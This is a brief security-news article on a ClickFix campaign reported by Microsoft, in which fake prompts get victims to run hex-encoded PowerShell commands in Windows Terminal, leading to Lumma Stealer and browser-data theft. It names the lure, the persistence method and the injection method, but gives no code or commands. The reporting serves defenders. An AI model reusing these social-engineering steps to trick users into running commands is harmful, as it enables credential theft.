Microsoft has identified a novel variant of the ClickFix attack that cleverly evades detection by directing victims to utilize the Windows Terminal instead of the conventional Run dialog. This shift in strategy marks a significant evolution in the tactics used by cyber attackers.
Innovative Methods to Evade Detection
Traditionally, ClickFix attacks have relied on deceptive tactics including fake CAPTCHA pages, troubleshooting prompts, and verification schemes to entice victims into executing harmful PowerShell commands. This latest iteration, however, distinguishes itself by instructing individuals to access Windows Terminal directly, bypassing the commonly targeted Run dialog.
According to Microsoft, the new campaign instructs users to employ the Windows + X → I shortcut, which launches Windows Terminal (wt.exe). This method seamlessly integrates into legitimate administrative workflows, thereby gaining the trust of users by appearing more credible.
Bypassing Traditional Protections
The attack, observed in February, enables perpetrators to circumvent security measures designed to prevent misuse of the Run dialog. By executing malicious commands in Windows Terminal, attackers initiate a PowerShell process that deciphers embedded hex commands, setting off a multi-stage attack that results in a Lumma Stealer infection.
This infection process is characterized by the use of scheduled tasks for persistence, anti-malware evasion techniques, and the targeting of browser data and other sensitive information for data exfiltration.
Variants and Broader Implications
Another form of this attack involves running malicious commands in Windows Terminal that lead to a batch script executed through command prompt and MSBuild.exe. This script connects to Crypto Blockchain RPC endpoints and utilizes QueueUserAPC()-based code injection into chrome.exe and msedge.exe processes to extract web and login data.
Further complicating the landscape, a recently identified variant called InstallFix uses imitation AI tool websites to deceive users into running harmful commands, which also results in data-stealing infections.
The emergence of these sophisticated ClickFix variants underscores the evolving nature of cyber threats, highlighting the need for continuous attention and adaptation in cybersecurity measures.
